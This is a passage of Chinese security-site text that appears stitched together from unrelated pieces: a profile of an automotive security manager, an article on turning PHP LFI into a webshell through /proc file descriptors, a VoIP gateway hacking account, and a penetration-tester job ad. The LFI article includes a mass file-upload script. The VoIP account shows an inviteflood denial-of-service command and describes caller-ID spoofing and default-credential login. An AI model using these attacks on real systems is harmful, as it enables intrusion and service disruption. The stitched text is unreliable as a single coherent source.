因为他敢于和领导针对安全问题叫板。“当有些事你只能去争取,我就会和其他公司和领导去争,做不好我就会给他们压力,因为事在人为,你要把权力握在自己手中,很多事才可以得以推行。”的确,信息安全在汽车行业的挑战让他不得不这么做。汽车行业的信息安全业务包括在三个方面–研发、制造和销售。因为汽车行业是制造业的皇冠,一切高精尖的技术都想应用在汽车里,比如最近很火的无人驾驶、AI等高科技的项目都会应用。之前的车子就像一部诺基亚手机,你只需要想油门刹车,和外界没有联系,而现在推行的车联网技术让汽车更像是智能手机,如今的工业4.0趋势在很多汽车行业已经实现了。同样在制造方面,依靠系统和机器人完成,在工厂中基本都是机械手臂,人只是在系统中设置好了参数监控过程和结果。无论是研发中高科技的应用还是在制造过程中高度使用一些工业控制系统来实现自动化,这样高精端的技术给安全事业带来的挑战无疑更大,所以他不得不争取领导更多的重视,他相信事在人为。

 

歐建军1.jpeg

(欧建军/受访者供图)

“就像网络安全法出来之后,我就赶紧借这个机会去找领导签署了一份网络安全承诺书。”当所有人都沉浸在这份法律出台的喜悦中,他没有囿于原地而还是选择持续给领导传达信息和压力,真正抓住这次机会去完成实践推行这份法律的落地。他也幽默地调侃“我就是喜欢搞事。”其实这是一种能力,他善于抓住每一个机会然后发挥作用。比如一次政府检查工作,他就借此事件告诉领导这是需要被重视的,我们还有哪些问题,努力推动安全事业哪怕只是一小步“永远不要等着它成熟,而是你做了什么事推进它的成熟。”他在招聘安全人才的时候一定会问这个问题:“你觉得信息安全的成功有哪些因素?”他们都回答,领导的重视,但当你在追问为了领导的重视你做了什么?他们便缄默不语。但如果下一次应聘的是欧建军本人,这个问题相信他可以满分做答。

 

WechatIMG209.jpeg

来到这家公司两年,他将公司的信息安全工作从无到有地有序开展起来,“当时我15年来到这里,没有人有安全观,我们经常被审出有问题,从安全管理到技术到管控都有问题但我们只针对一个问题去改,没有人有全局观,也没有体系和框架。”意识到这些之后,James就开始从管理和技术两方面梳理和建立整个安全体系架构,建立信息安全组织,包括顶层的信息安全委员会以及工作层面的信息安全小组,对员工进行一些安全意识的培训,同时尽可能把自己的组织架构和汇报机制建立起来。而在技术方面安全运维、数据安全、安全加固这些也是推动安全意识、安全手段落地的重要环节。在他的努力下公司成立了一个风险管理委员会,这个成员包含了公司的两位老总和母公司的CFO,借助这个会议,他们努力把信息安全作为其中的一个定期的项目,通过汇报问题和想做的事情从而得到领导的支持,得到这个层次的领导支持在公司推行就很容易了。说到这里,他讲到:“对我来说影响最大的是我们两位CIO, 我认为他们是非常开明民主的,他们会支持你认为要做的事情,也会给预算,很幸运遇到他们吧。”有时候幸运是努力的附属品。

 

在这家公司努力了两年后的现在,他开始将信息安全工作扩展到其他部门,比如HR,采购等而不仅仅是IT部门,整个组织架构和全局的安全观在慢慢形成,但这种意识的提高绝不仅仅在于管理的成果,他创新性地提出在安全文化的建立行成中技术的至关重要性,这是在其他管理者中很少听到的观点。“其实这是两个方向,重技术还是重管理,而我认为你要通过一些技术手段拿到一些有用的信息以后,你才会推动这个管理。”比如他提到的数据防泄漏方案—DLP,这种系统可以清楚地看到数据是通过谁、以哪种方式泄露的。这样就可以问责到人,进行相应的惩罚,惩罚就会引起重视,人们就不会轻易的再去做这种数据泄露的事情。有很多公司就是通过DLP真正地把数据安全的事情抓起来了。

 

“这就是技术带来的变化,在你技术薄弱的时候你就想办法把技术抓上去,等技术建设好了,你再去抓管理。之前我也天天在推什么安全日、安全周、全国巡演到各个公司宣传,来到这个公司我觉得这样做的效果并不好,还是要先发现问题并解决问题,这样的安全培训才是有效的。”当技术和管理都到了成熟的阶段,一个公司自然会形成一种安全的气场。

 WechatIMG210.jpeg

坚定和勇敢是他工作时的标签,自由幽默是他谈话的方式。他一直在打破我对安全人员的刻板印象。同时他也总把问题和困难讲的很轻,他说“我十分热爱我的行业,我对信息安全很感兴趣”,“这是我主动选择的,04年IT行业的ERP是最火的,我也做过这个行业,当时认为时代的发展趋势数据安全对一个公司是至关重要的,就选择了它虽然当时很冷门,但现在我在这个行业10多年了,大部分在世界五百强工作,我觉得我的工作是有价值的,我坚信。”

 

想起他谈到工作的价值,他也很坚定地说这难以让外人理解,但对工作的热爱他似乎更在意自身的建设和认同感而非别人的赞扬,他说“我觉得自己像一个侠客,我领导说我更像警察,我说对,我就是警察,这个安全的底线我永远也不会松口和放手。”

*本文原创作者:jfeiyi,本文属FreeBuf原创奖励计划,未经许可禁止转载

关注PHP漏洞的朋友一定知道LFI+phpinfo可以搞出一个webshell。具体点击此处可看。 LFI这个条件还算正常,但phpinfo这个还是比较难凑的,所以有点鸡肋。接下来,我分享一个……同样鸡肋的思路……大家先把屠刀放下!虽然鸡肋,但思路还是值得探讨的。

起因是一篇老外写的文章,读完后发现他的思路或许可以和PHP LFI结合。 文章前面写Java那段简直就是意淫,但是后来提到当linux进程访问一个文件的时候会在/proc/{PID}/fd/下创建一个文件描述符来指向被访问的文件。比如/proc/1234/fd/5会指向/tmp/tmpXXX。而如果你cat proc/1234/fd/5,就会看到/tmp/tmpXXX的内容。而我们知道,向任何php脚本发送上传文件的请求,php都会创建一个临时文件来保存上传的当内容,当php脚本执行结束才删除这个临时文件。那么当创建临时文件的时候,一定会创建相应的文件描述符。如果我们能找到对应的文件描述,应该就能通过文件包含实现webshell了。一开始我想难点是猜出PID和文件描述符编号,PID一般是几千,apache进程的文件描述符编号一般就只在1-20之间,所以理论上暴力破解并不难。后来我发现其实搞定PID和文件描述符编号要比想象中简单得多。

实验步骤我就写得简洁一点了。

首先,我们需要不断上传文件到任意php脚本,这个文件最好还大一些。我用的是一个大概4mb的文件,似乎上传文件有大小限制,太大的文件我没有实验成功,也没有深究。然后就是写个程序不断上传这个文件就好,我用的是jquery+HTML。更理想一点应该是用python/java跑多线程。以下是源代码:

<html>
<body>
<script src="https://code.jquery.com/jquery-1.10.2.js"></script>

<form id="form" action="http://192.168.174.128/Default.php" method="post" enctype="multipart/form-data">
<input type="file" name="test">
<input type="submit">
</form>
<script>
$( "form" ).submit(function( event ) {
  uploadFiles(event);
  return;
});
var files;

$('input[type=file]').on('change', prepareUpload);

function prepareUpload(event)
{
files = event.target.files;
}
function uploadFiles(event)
{
event.stopPropagation();
  event.preventDefault();

  var data = new FormData();
  $.each(files, function(key, value)
  {
      data.append(key, value);
  });
var i=0;
for(;i<1000;i++){
$.ajax({
url: 'http://192.168.174.128/Default.php',
type: 'POST',
data: data,
cache: false,
dataType: 'json',
processData: false,
contentType: false,
success: function(data, textStatus, jqXHR)
{
if(typeof data.error === 'undefined')
{
submitForm(event, data);
}
else
{
console.log('ERRORS: ' + data.error);
}
},
error: function(jqXHR, textStatus, errorThrown)
{
console.log('ERRORS: ' + textStatus);
}
});
//wait(100);
}
}
function wait(ms){
  var start = new Date().getTime();
  var end = start;
  while(end < start + ms) {
    end = new Date().getTime();
}
}
</script>
</body>
</html>

运行截图:

把PHP LFI漏洞变成Webshell的思路

运行后可以在服务器上看到如下结果:

把PHP LFI漏洞变成Webshell的思路

可以看到确实有临时文件创建了,而且也有文件描述符被创建,最重要的是文件描述符编号全部都是13,可能不同的机器上这个编号不同,但只要它是一个恒定的数字,那么就可以省去相当的多的猜解时间。比如只暴力猜测pid,运行多次,而每次只使用一个文件描述符编号就行。

接下来我就测试了一下是否能真的读到内容,我挑了3个pid,随便cat了几次,还真就成功了:

把PHP LFI漏洞变成Webshell的思路

有人会说猜测pid也是一件很费劲的事,毕竟文件描述符只存在于读写文件的时候,即使php脚本执行时间很长,文件描述符也不会一直存在。且即使几个apache进程会不断处理上传的文件,但短时间内猜测一千到一两万的数字还是很难中的。后来经过我不断探索,发现apache的第一个进程的pid是可以直接读到的。用LFI直接读/var/run/apache2/apache2.pid就行,这个文件是所有用户可读的:

把PHP LFI漏洞变成Webshell的思路

而apache创建的其他进程的pid会在这个编号上递增。而apache也就创建几个进程而已,所以猜测范围可能都不超过20。会有一两个进程的pid不按这个规律,我也不知道为啥,但并不碍事。

看到cat出内容的时候我那个激动啊,说明离成功只有一步之遥了,要是成功了就变成个大杀器了!然而当我通过浏览器进行暴力破解的时候怎么也不成功,我那个郁闷啊。后来看到错误日志的时候才彻底懵逼:

把PHP LFI漏洞变成Webshell的思路

。。。我不是专搞php的,后来经过学习才发现虽然apache会以root运行,但它会创建子进程以www-data来运行php。而文件描述符是属于服务器权限内也就是root的,所以www-data读不了。我当时那个沮丧啊。。。。这就是这个思路最终沦为鸡肋的原因。文件描述符应该只有owner可读,也就是说要么apache和php都配置为同一个用户运行,要么就是用别的服务器运行php了。毕竟根据老外文章中给的python例子,服务器的权限一般和应用程序的一样,tomcat+Java也是同权限,只有apache+php这个组合有点奇葩。

*本文原创作者:jfeiyi,本文属FreeBuf原创奖励计划,未经许可禁止转载

本文作者:i春秋签约作家——屌丝绅士如需转载请联系i春秋专栏

0×01背景:

      想很多科幻大片都可以用“任意显”等软件直接拨打电话你是不是也想那样牛逼呢,不过你也不用太高兴,很多东西不流行都是有原因的,比如我们这边文章关于voip的压力测试,voip这个服务很不常见而且也需要一些运营商才能提供的设备才能各大搭建出一些环境。但是 有幸的是,在某家公司上班的时候 恰好存在这种设备,而且存在相关漏洞,当时写的报告上交过,但并没有反馈,却被一句话鼓励掉了,想想现在要是没走,也能当个经理了,不过我不后悔。我还年轻,我还能拼!,咳咳 说多了,时隔半年,现在拿出这篇当初提交的漏洞作为案例也不为过,而且  全程不打马赛克,因为他是内网啊!哈哈

0×02起始:

      万能的弱口令真的能搞穿内网,就像本篇文章,回想起来我发的文章目前为止都是一些简单的,大部分都是弱口令的那种,仿佛离开了弱口令,我就是一个菜鸡,时光荏苒,岁月流逝,不知不觉的长大了,

      就像我起始说的那样,全程不打马赛克,因为是内网,打不打无所谓的,我简单的说下事情的开始吧,做公司网管,经常有同事说哪里的电话打不出去,哪里的电话不通,等等情况,每次都发现是语音网关出了问题,一重启就好,无论是抓包还是换网线都不行,后来开着nmap –script扫了一下,有一些语音网关开着80的端口,登陆上去之后 还需要账号和密码,那咋办,爆破吧,爆了一天一宿可没中

图片1.png

这咋办,看着这个网页就犯愁,瞎蒙吧,看见啥蒙啥被,最后看到了设备名称,也就是那个大大的 mx120,密码账号都是,,上去了发现没有卵用啊,看日志也没有什么东西,只有 登录的记录,紧接着在配置页面发现了一条注释,大致意思是,请修改默认5060端口以防止泛洪攻击,让我刷的一下眼前一亮,泛洪攻击啊,这明显就是dos攻击啊,然后就去谷歌了一下,关于voip的相关漏洞文档和kali下的voip模块,,结果还真有,

图片2.png

恰好,kali下有相关的工具 针对  voip服务的压力测试,简单的看了一下参数 ,测试了一下,确实好用啊,以下是相关的参数以及用途


[email protected]:~# inviteflood eth0 5000 192.168.10.9 192.168.10.9 50000

接口 目标主机名 目标ip  目标ip   发送的数据包大小

inviteflood – Version 2.0

              June 09, 2006

source IPv4 addr:port   = 192.168.11.209:9

dest   IPv4 addr:port   = 192.168.10.9:5060

targeted UA             = [email][email protected][/email]

Flooding destination with 50000 packets

sent: 50000  

 经过测试  以发送五万的数据包就可以造成语音网关未响应的情况,让我不由得眼前一亮,这要是干销售,想休息,直接打一会,哈哈 都歇着,哈哈

图片3.png

 在搜索该工具的相关使用方法的时候 发现了更好玩的东西,恩 和我们的标题契合了,那就是 通过谷歌进行搜索的时候发现了可以通过伪造数据包,以达到变号的目的,,该工具已经集成在了msf中,当时简单的测试了一下,却忘了截图,

图片4.png

当时试了很多遍才成功,但大体的思路记住了,那就是直接用msf的模块,其实msf的模块只要记住模块的名字,直接search就好了,记不住模块就有点伤不起了,另一个 和msf模块类似 也就是上面说的那个,通过伪造数据包,篡改来电话号,这个电话号大家不要误会,不是我们使用的 十一位的电话,而是指座机电话,

图片5.png

在此不妨给大家屡屡思路,先说这个工具的作用吧,第一他能针对 语音网关进行dos攻击,导致语音网关宕机,第二,可以发送虚拟数据包,给另一个座机打电话,(能不能给手机打没测试,但估计够呛)第三点  第四点,,大家脑洞大开吧,

图片6.png

0×03反思:

       本文中涉及到的漏洞有那几个?

            首先是弱口令,使用了设备的默认密码,

            第二,由于开发人员失职,未修改默认数据端口,导致可以轻松根据默认端口进行拒绝服务攻击,

            第三,管理人员失职,该漏洞经上报与上级,却并未正视问题所在,再三推脱却不予修复

0×04总结:

     “任何带电的都可以被黑”忘了是在哪里看到的一句话了,我觉得并不是在开玩笑,也不是无稽之谈,看看现在用的这些设备,有很多设备都离不开了电,若有一天,电 消失了,我们又该怎样?,在反观企业,在外表宣传的如何如何的坚固,网站如何如何的安全,却总是忽视了内网的 网络安全,最终还是功亏一篑,

冠群驰骋投资管理(北京)有限公司作为一家全国范围内专业扶持中小微企业的P2B金融服务平台,秉承“扶微助小,助梦中国”的企业宗旨,长期关注中小微企业的发展。通过深入调查研究,结合具体国情及中小微企业的特性,为中小微企业量身打造了创新金融模式,融智融汇,解决中小微企业发展难题。

冠群驰骋.jpg

冠群驰骋公司业务涵盖互联网金融、”债股结合”等,致力于打造债权和股权相结合的全金融产业链新商业模式,并建立冠群实体企业生态圈,让有需求的中小微实体企业均能够得到有效的资金支持与完善的资源体系。

公司规模:5000人团队,300多家分公司遍布全球。

公司现在线上主业务为冠e通,冠e通是在2015年7月份正式对外运营。在两年的过程中,已经有了近百万注册用户和突破200亿出借金额的傲人成绩。

渗透测试工程师

经验:3年以上

工资范围:10-20k

工作地点:北京-东直门

岗位职责:

1、负责应用安全测试与风险评估,推动落地漏洞管理解决方案;

2、负责业务所用代码、框架、组件等相关安全漏洞的研究;

3、跟踪安全社区的安全动态,并进行漏洞分析、挖掘和前沿安全攻防技术的研究;

4、配合安全事件的应急响应;

5、领导交办的其他事项。

任职要求:

1、熟悉常见的安全漏洞原理,熟悉OWASP&Mobile TOP 10漏洞原因与修复方案;

2、熟练使用安全测试工具,可独立完成WEB、APP安全测试;

3、熟练使用Linux操作系统,掌握一种或多种编程语言(java/python/php等);

4、熟悉企业内软件安全开发周期(SDL);

5、具有良好的学习能力,沟通能力和团队合作精神;

6、对代码安全审计有一定了解,并能独立进行白盒代码review(加分项);

7、了解APP的反编译/动态调试/加密/防劫持/安全加固等技术(加分项);

8、有从事互联网金融行业经验(加分项);

9、在各大SRC、众测平台提交漏洞的白帽子(加分项)。

有意请发简历至邮箱:[email protected] (请注明来自 FreeBuf.COM)